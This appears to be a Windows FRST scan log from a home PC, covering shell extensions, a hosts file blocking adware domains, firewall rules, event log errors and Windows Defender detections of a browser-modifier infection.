ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2015-03-03] (CyberLink Corp. -> Cyberlink)
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Foxit_ConvertToPDF] -> {C5269811-4A29-4818-A4BB-111F9FC63A5F} => C:\Program Files (x86)\Foxit PhantomPDF\plugins\ConvertToPDFShellExtension_x64.dll [2015-03-03] (Foxit Software Incorporated -> Foxit Software Inc.)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2015-03-03] (CyberLink Corp. -> Cyberlink)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2018-09-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\JLO Squared\Desktop\Lifesize Guest.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=cgmegfmapkpchpakidcpkjdhpobgeoeo
ShortcutWithArgument: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Lifesize Guest.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=cgmegfmapkpchpakidcpkjdhpobgeoeo
ShortcutWithArgument: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d249d9ddd424b688\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default

==================== Loaded Modules (Whitelisted) =============

2019-02-21 21:00 - 2019-02-21 21:00 - 000078336 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 05:25 - 2020-04-29 12:04 - 000002103 _____ C:\WINDOWS\system32\drivers\etc\hosts
0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly
0.0.0.0 tracking.opencandy.com.s3.amazonaws.com
0.0.0.0 media.opencandy.com
0.0.0.0 cdn.opencandy.com
0.0.0.0 tracking.opencandy.com
0.0.0.0 api.opencandy.com
0.0.0.0 api.recommendedsw.com
0.0.0.0 rp.yefeneri2.com
0.0.0.0 os.yefeneri2.com
0.0.0.0 os2.yefeneri2.com
0.0.0.0 installer.betterinstaller.com
0.0.0.0 installer.filebulldog.com
0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net
0.0.0.0 inno.bisrv.com
0.0.0.0 nsis.bisrv.com
0.0.0.0 cdn.file2desktop.com
0.0.0.0 cdn.goateastcach.us
0.0.0.0 cdn.guttastatdk.us
0.0.0.0 cdn.inskinmedia.com
0.0.0.0 cdn.insta.oibundles2.com
0.0.0.0 cdn.insta.playbryte.com
0.0.0.0 cdn.llogetfastcach.us
0.0.0.0 cdn.montiera.com
0.0.0.0 cdn.msdwnld.com
0.0.0.0 cdn.mypcbackup.com
0.0.0.0 cdn.ppdownload.com
0.0.0.0 cdn.riceateastcach.us
0.0.0.0 cdn.shyapotato.us
0.0.0.0 cdn.solimba.com
0.0.0.0 cdn.tuto4pc.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;c:\Program Files\Intel\WiFi\bin\;c:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files\Hewlett-Packard\SimplePass\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\Intel® Management Engine Components\IPT;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "DBAgent"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\StartupFolder: => "EvernoteClipper.lnk"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Uploader"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A3B55F10413EDA3726B7768FB296E183"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{5C608EC7-892F-4E65-9021-63D8A9261FBE}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation -> )
FirewallRules: [{A213BC19-CF64-4D88-8B7A-E7F56E3D83C8}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{2F46AA1C-95F3-4268-AD13-67E5AE4E3A48}] => (Allow) LPort=8888
FirewallRules: [{26D54691-B934-4B25-967C-55C9BA4D3DEE}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3FBF4668-1575-49E3-B035-1BD66D5EBA80}] => (Allow) LPort=1900
FirewallRules: [{0F7394F7-8C37-4D04-87B3-D883AD3EEA32}] => (Allow) LPort=2869
FirewallRules: [{393A2089-6D6E-4E90-B6F1-1FA79D92C667}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{56303450-2E97-4203-82C2-C7522651DF35}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{756B7453-67C8-4AD4-A941-F4FC262DE221}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{45ABC1E7-4EA2-4E0B-9AC9-7E131B1FBECD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F6C8CB9C-1EA8-43CA-A386-879ECAC8C94C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{077F17D4-1446-4933-9117-AAEB441FC768}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe No File
FirewallRules: [{1E1617E6-3094-45CB-BC3B-99928F554A34}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE No File
FirewallRules: [{C8CF8DA6-393D-4D2A-8BE3-3947F033C1A9}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{9D9685CC-EA94-4BC6-876D-3D8270DE5F1C}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe No File
FirewallRules: [{55FD4156-2D42-4105-9587-A153B6A01521}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe (CyberLink Corp. -> CyberLink)
FirewallRules: [{6E4FFFC8-B968-48DF-970F-36508EB8FF7C}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe No File
FirewallRules: [{681998E0-5CB6-4E19-A6BC-30DE309E04D3}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{C063EF77-D9DE-4C9E-9F5D-F899661F3BE2}] => (Allow) c:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe (CyberLink Corp. -> CyberLink Corp.)
FirewallRules: [{F52AB453-A2A8-4C7E-A994-67F89CF58A85}] => (Allow) C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe No File
FirewallRules: [{76F4F286-5BF0-418D-A8AB-650A8ED30018}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [TCP Query User{27211225-A696-49F7-90CA-2827010E7EBF}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{FFCA8B75-BFCB-4C4C-9272-6750CE03E4C6}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{7904710B-852A-4399-9D5A-13B13E162407}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{0374141B-F51D-4A94-862F-9CAD437F2590}C:\users\jlo squared\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\jlo squared\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{4D213123-3326-4C71-80E7-E89A0B0FBDE1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{B5EB9F1B-FB29-4CC8-946B-0437BEEC22C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{6CFD723C-617F-4421-BD26-E847F8BAC7A6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CFAE1CFF-43F0-42CD-BF81-FDE50DD72009}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{CD79AB71-EB67-4D84-924C-FB74A2A87A00}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{476D186D-995A-4AC1-BF49-B5EB04EF7886}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{ADBBB322-519B-460B-AB07-35385437BA27}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{6BC79577-0C73-4C3E-BF9C-22DCDBBDBD77}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{6495AAC7-BB0A-4D78-9207-A6341C53F190}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{C65E95A2-185B-46C7-B0D9-F9C77A816C1E}] => (Allow) LPort=5357
FirewallRules: [{E8B7E0C2-2A66-44FD-BA84-E47A77CCB3DA}] => (Allow) C:\Program Files\HP\HP ENVY 7640 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [TCP Query User{908C8609-488C-4742-9DD7-B4B65A3E3840}C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe] => (Allow) C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe (Seagate Technology LLC -> Seagate Technology LLC)
FirewallRules: [UDP Query User{3332F2C1-899B-49D3-A954-FE911F91ACF2}C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe] => (Allow) C:\program files (x86)\seagate\seagate dashboard 2.0\dashboard.exe (Seagate Technology LLC -> Seagate Technology LLC)
FirewallRules: [{CCDDA565-AD2F-4038-B2C3-0A9ABE23C1EE}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{4D7C48CD-9DA1-456D-9FC5-34237CE7C786}] => (Allow) C:\Users\JLO Squared\AppData\Local\Chromium\Application\chrome.exe No File
FirewallRules: [{1A2A6BDC-D44B-4AE6-95E8-1F2B125216F7}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{13F68EDE-1FC4-4551-B541-03C2949007C0}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3272241D-CA66-4279-BFE3-147F51F36BC7}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{4DD10FCB-50EE-4C4C-8994-540BFF93ABB2}] => (Allow) C:\Users\TEMP.Office\AppData\Local\Chromium\Application\chrome.exe No File
FirewallRules: [{5FF4E1A6-D489-4C1D-A0B4-82857AD6DEC6}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================

12-04-2020 10:18:39 Scheduled Checkpoint
15-04-2020 17:09:39 Windows Update
27-04-2020 12:24:58 Scheduled Checkpoint

==================== Faulty Device Manager Devices ============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Microsoft Hyper-V Virtualization Infrastructure Driver
Description: Microsoft Hyper-V Virtualization Infrastructure Driver
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: Vid
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: ========================

Application errors:
==================
Error: (04/29/2020 12:06:27 PM) (Source: Microsoft-Windows-WMI) (EventID: 24) (User: NT AUTHORITY)
Description: Event provider $Core attempted to register query "select * from __InstanceOperationEvent" whose target class "__InstanceOperationEvent" in //./root namespace does not exist. The query will be ignored.

Error: (04/29/2020 12:00:07 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
Description: Windows cannot delete the profile directory C:\Users\TEMP.Office. This error may be caused by files in this directory being used by another program.

DETAIL - The directory is not empty.

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 522) (User: )
Description: StartMenuExperienceHost (9468,P,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied. ". The operation will fail with error -1032 (0xfffffbf8).

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 455) (User: )
Description: StartMenuExperienceHost (9468,R,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: Error -1023 (0xfffffc01) occurred while opening logfile C:\Users\TEMP.Office\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (04/29/2020 11:57:29 AM) (Source: ESENT) (EventID: 522) (User: )
Description: StartMenuExperienceHost (9468,P,98) TILEREPOSITORYS-1-5-21-3444092895-3226993445-944412456-1001: An attempt to open the device with name "\\.\C:" containing "C:\" failed with system error 5 (0x00000005): "Access is denied. ". The operation will fail with error -1032 (0xfffffbf8).

Error: (04/29/2020 11:53:17 AM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1511) (User: Office)
Description: Windows cannot find the local profile and is logging you on with a temporary profile. Changes you make to this profile will be lost when you log off.

Error: (04/29/2020 11:48:47 AM) (Source: ESENT) (EventID: 455) (User: )
Description: svchost (7276,R,98) TILEREPOSITORYS-1-5-18: Error -1023 (0xfffffc01) occurred while opening logfile C:\WINDOWS\system32\config\systemprofile\AppData\Local\TileDataLayer\Database\EDB.log.

Error: (04/29/2020 11:37:16 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

System errors:
=============
Error: (04/29/2020 12:19:12 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (04/29/2020 12:18:07 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:49 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:38 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:24 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:17:01 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:16:35 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (04/29/2020 12:16:03 PM) (Source: DCOM) (EventID: 10005) (User: Office)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Windows Defender:
===================================
Date: 2020-03-03 16:06:10.892
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:06:04.605
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe; process:_pid:3128,ProcessStart:132277574638710176
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:04:49.461
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-03-03 16:04:41.586
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou.A!cl&threatid=248284&enterprise=0
Name: BrowserModifier:Win32/Prifou.A!cl
ID: 248284
Severity: High
Category: Browser Modifier
Path: file:_C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: Real-Time Protection
Process Name: C:\Users\JLO Squared\AppData\Local\Temp\dafcm\fadadela.exe
Security intelligence Version: AV: 1.311.481.0, AS: 1.311.481.0, NIS: 1.311.481.0
Engine Version: AM: 1.1.16800.2, NIS: 1.1.16800.2

Date: 2020-02-29 17:20:15.831
Description:
Windows Defender Antivirus scan has been stopped before completion.
Scan ID: {7C751F37-B9DB-4614-8F9B-C95D7D4B86F6}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2020-01-17 00:28:48.150
Description:
Windows Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version:
Previous security intelligence Version: 1.307.2466.0
Update Source: Microsoft Update Server
Security intelligence Type: AntiVirus
Update Type: Full
Current Engine Version:
Previous Engine Version: 1.1.16600.7
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

CodeIntegrity:
===================================

Date: 2020-04-29 11:59:29.475
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:59:29.445
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:59:29.395
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Windows signing level requirements.

Date: 2020-04-29 11:58:35.447
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.415
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.382
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.349
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

Date: 2020-04-29 11:58:35.315
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume4\Program Files\AVG\Antivirus\aswAMSI.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

